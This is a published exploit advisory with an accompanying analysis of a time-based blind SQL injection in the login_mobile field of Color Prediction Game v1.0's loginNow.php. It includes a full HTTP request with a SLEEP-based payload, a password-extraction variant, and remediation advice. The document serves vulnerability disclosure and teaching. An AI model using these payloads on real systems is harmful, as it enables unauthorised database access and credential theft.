Color Prediction Game v1.0 - SQL Injection
# Exploit Title: Color Prediction Game v1.0 - SQL Injection
# Date: 2023-08-12
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://www.codester.com/items/44411/color-prediction-game-php-script
# Tested on: Kali Linux & MacOS
# CVE: N/A
### Request ###
POST /loginNow.php HTTP/1.1
Host: localhost
Cookie: PHPSESSID=250594265b833a4d3a7adf6e1c136fe2
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0)
Gecko/20100101 Firefox/116.0
Accept: */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=---------------------------395879129218961020344050490865
Content-Length: 434
Origin: http://localhost
Referer: http://localhost/login.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
-----------------------------395879129218961020344050490865
Content-Disposition: form-data; name="login_mobile"
4334343433
-----------------------------395879129218961020344050490865
Content-Disposition: form-data; name="login_password"
123456
-----------------------------395879129218961020344050490865
Content-Disposition: form-data; name="action"
login
-----------------------------395879129218961020344050490865--
### Parameter & Payloads ###
Parameter: MULTIPART login_mobile ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: -----------------------------395879129218961020344050490865
Content-Disposition: form-data; name="login_mobile"
4334343433' AND (SELECT 4472 FROM (SELECT(SLEEP(5)))UADa) AND 'PDLW'='PDLW
-----------------------------395879129218961020344050490865
Content-Disposition: form-data; name="login_password"
123456
-----------------------------395879129218961020344050490865
Content-Disposition: form-data; name="action"
login
-----------------------------395879129218961020344050490865--Color Prediction Game v1.0 – SQL Injection Vulnerability Analysis
Security vulnerabilities in web applications remain a persistent threat, especially in open-source projects that lack rigorous code review. One such example is the Color Prediction Game v1.0, a PHP-based script available on Codester (vendor: Codester). Despite its seemingly innocuous purpose—predicting colors in a game-like interface—it harbors a critical SQL Injection flaw that enables attackers to manipulate database queries through crafted input.
Exploit Overview: Time-Based Blind SQL Injection
The vulnerability was discovered and reported by cybersecurity researcher Ahmet Ümit Bayram on August 12, 2023. The exploit targets the loginNow.php endpoint, which handles user authentication via a multipart/form-data POST request. The attack leverages a time-based blind SQL injection technique, allowing attackers to infer database behavior by observing delays in response times.
This method is particularly effective when direct data retrieval is not possible—common in environments where error messages are suppressed or filtered. The attacker injects a payload that causes the database to sleep for a defined duration, enabling detection of successful injection based on observed latency.
Attack Vector: POST Request with Custom Payload
The exploit uses the following request structure:
POST /loginNow.php HTTP/1.1
Host: localhost
Cookie: PHPSESSID=250594265b833a4d3a7adf6e1c136fe2
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------395879129218961020344050490865
Content-Length: 434
Origin: http://localhost
Referer: http://localhost/login.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
-----------------------------395879129218961020344050490865
Content-Disposition: form-data; name="login_mobile"
4334343433' AND (SELECT 4472 FROM (SELECT(SLEEP(5)))UADa) AND 'PDLW'='PDLW
-----------------------------395879129218961020344050490865
Content-Disposition: form-data; name="login_password"
123456
-----------------------------395879129218961020344050490865
Content-Disposition: form-data; name="action"
login
-----------------------------395879129218961020344050490865--
Key components of this request:
- Parameter:
login_mobile— the vulnerable field. - Method: multipart/form-data — standard for file uploads, but used here to bypass input sanitization.
- Payload:
' AND (SELECT 4472 FROM (SELECT(SLEEP(5)))UADa) AND 'PDLW'='PDLW— a time-based blind injection.
How the Payload Works: SQL Injection Mechanics
Let’s break down the injected payload:
' AND (SELECT 4472 FROM (SELECT(SLEEP(5)))UADa) AND 'PDLW'='PDLW
This is a classic time-based blind SQL injection payload designed for MySQL databases (version ≥ 5.0.12). Here’s what each part does:
'— closes the string context and introduces SQL injection.AND (SELECT 4472 FROM (SELECT(SLEEP(5)))UADa)— the core of the exploit. TheSLEEP(5)function pauses the database for 5 seconds.UADa— a dummy alias to satisfy MySQL’s syntax requirements.AND 'PDLW'='PDLW— a always-true condition to maintain the logical structure.
When the database processes this query, it will execute SLEEP(5), causing a 5-second delay. If the server response takes longer than expected, the attacker knows the injection succeeded.
Why This is Dangerous
Time-based blind SQL injection may seem less impactful than classic data-extraction attacks, but it is a powerful tool in the hands of skilled attackers. It allows for:
- Confirming the presence of SQL injection vulnerabilities.
- Enumerating database version and structure.
- Extracting sensitive data through sequential probing (e.g., using
ORD()andCHAR()functions). - Escalating to full database compromise, including user credentials, session tokens, and configuration files.
Moreover, the vulnerability is not limited to the login endpoint. If similar input sanitization failures exist elsewhere in the codebase—such as in registration, game history, or admin panels—the entire system could be at risk.
Real-World Implications
Consider a scenario where an attacker uses this exploit to:
- Verify if the database is MySQL.
- Test if the application is vulnerable to SQL injection.
- Automate data extraction by probing each character of a password using
SLEEP()andCHAR()functions.
For example, to extract the first character of a user password:
' AND (SELECT 4472 FROM (SELECT(SLEEP(5)))UADa WHERE ASCII(LEFT((SELECT password FROM users WHERE id=1),1))=100) AND 'PDLW'='PDLW
By adjusting the ASCII value (e.g., 100 for 'd'), the attacker can confirm the character via response delay.
Remediation & Security Best Practices
Developers must adopt robust security practices to prevent such vulnerabilities:
- Input Validation: Always validate and sanitize user input using whitelisting or regex patterns.
- Prepared Statements: Use parameterized queries (e.g.,
PDO::prepare()ormysqli_stmt_prepare()) to eliminate SQL injection risks. - Database Abstraction: Avoid raw SQL queries; use ORM frameworks like Laravel or Doctrine.
- Security Headers: Enable
X-Content-Type-Options: nosniffandContent-Security-Policyto reduce attack surface. - Regular Audits: Conduct penetration testing and code reviews, especially for open-source projects.
Conclusion
The Color Prediction Game v1.0 serves as a stark reminder that even simple applications can harbor critical vulnerabilities. The time-based blind SQL injection in loginNow.php underscores the importance of secure coding practices, especially in PHP-based web applications. Developers should never assume that "small" projects are immune to attacks—security is a continuous process, not a one-time fix.
For end-users, always verify the source and integrity of downloaded scripts. Avoid using unverified open-source code in production environments. When in doubt, perform a security audit or consult a professional penetration tester.